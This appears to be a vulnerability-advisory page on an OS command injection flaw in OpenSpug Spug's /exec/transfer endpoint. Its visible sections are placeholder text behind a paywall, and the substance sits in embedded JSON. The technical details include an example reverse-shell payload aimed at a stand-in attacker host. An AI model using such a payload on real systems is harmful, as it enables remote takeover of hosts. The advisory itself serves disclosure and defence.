Sceawere

Vulnerability Detail

CVE-2026-108540UPDATED Verified Sceawere Triage Sources: NVD / CISA KEV

OpenSpug Remote OS Command Injection

Vulnerability Metadata

Severity
Critical
Score / CVSS
9.9
Creation Date
3h ago
Vendor
OpenSpug
Product
Spug
Attack Type
OS Command Injection
Vector String
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
Attack Complexity
LOW

Narrative and Response

Description

A flaw has been found in OpenSpug Spug up to 3.4.0/4.0.1. This impacts an unknown function of the file /exec/transfer of the component File Transfer. Executing a manipulation can lead to os command injection. The attack may be launched remotely. The exploit has been published and may be used. The vendor was contacted early about this disclosure but did not respond in any way.

Executive Summary

Lorem ipsum dolor sit amet, consectetur adipiscing elit. Sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat.

Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum.

Executive Summary Locked

Sign up to unlock professional threat analysis, mitigations, and indicator signatures.

Technical Details

Lorem ipsum dolor sit amet, consectetur adipiscing elit. Sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat.

Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum.

Detailed Technical Analysis Locked

Sign up to unlock professional threat analysis, mitigations, and indicator signatures.

Mitigations

Lorem ipsum dolor sit amet, consectetur adipiscing elit. Sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat.

Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum.

Remediation & Mitigations Locked

Sign up to unlock professional threat analysis, mitigations, and indicator signatures.

References

Lorem ipsum dolor sit amet, consectetur adipiscing elit. Sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat.

Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum.

Intelligence References Locked

Sign up to unlock professional threat analysis, mitigations, and indicator signatures.

Additional Metadata

{
  "score": "9.9",
  "pubDate": "2026-10-11T07:17:23.303Z",
  "pubdate": "2026-10-11T07:17:23.303Z",
  "executiveSummary": "OpenSpug Spug versions up to 3.4.0 and 4.0.1 are susceptible to an OS command injection vulnerability located within the file transfer functionality.\nThe vulnerability resides in the /exec/transfer endpoint, allowing a remote, unauthenticated, or authenticated attacker (depending on implementation specifics) to inject and execute arbitrary operating system commands.\nSuccessful exploitation results in full remote code execution, granting the attacker the ability to interact with the underlying host system with the privileges of the Spug application process.\nGiven that exploit code is publicly available and the vendor has not provided a response or a patch, the risk to organizations deploying Spug is critical.\nThis flaw allows for complete system compromise, potential data exfiltration, and lateral movement within the network infrastructure where the Spug instance resides.",
  "technicalDetails": "The vulnerability is categorized as an OS Command Injection flaw within the OpenSpug File Transfer component. The root cause is the improper sanitization and validation of user-supplied input handled by the /exec/transfer file path.\nIn typical OS command injection scenarios, the application constructs a system call by concatenating user-provided input strings directly into a shell command line without adequate escaping or the use of safe API alternatives (such as using parameterized arrays rather than shell execution functions like os.system or subprocess.call with shell=True).\nThe attack flow begins with the attacker crafting a malicious payload containing shell metacharacters—such as semicolons (;), backticks (`), pipes (|), or logical operators (&&, ||)—which break out of the intended command structure. By sending a crafted request to the /exec/transfer endpoint, the attacker forces the underlying operating system to interpret these metacharacters as part of the command sequence.\nUpon processing the request, the application passes the unsanitized input to the host operating system shell. The shell then executes the primary legitimate process followed by the injected malicious commands. Because the Spug service often requires high-level privileges to perform remote file transfers and system management, the injected payload executes with the privileges of the Spug service account.\nTechnical exploitation typically follows these steps: 1) Identification of the input vector within the /exec/transfer request structure. 2) Crafting a payload designed to interact with the system, such as a reverse shell trigger (e.g., /bin/bash -c 'bash -i >& /dev/tcp/attacker_ip/port 0>&1') or arbitrary file creation. 3) Submission of the malicious payload via the vulnerable endpoint. 4) The application backend improperly interprets the payload, leading to the spawn of a secondary shell process controlled by the attacker.\nThe impact of this vulnerability is total system compromise. An attacker can execute arbitrary binaries, install persistence mechanisms, exfiltrate sensitive configuration files, modify internal Spug databases, or leverage the compromised host as a pivot point for further attacks on the internal network infrastructure. As this flaw is exploitable remotely, it presents an immediate and high-impact threat to the confidentiality, integrity, and availability of the affected environment."
}
CVE-2026-108540: OpenSpug Remote OS Command Injection (CRITICAL Severity, CVSS: 9.9) | Sceawere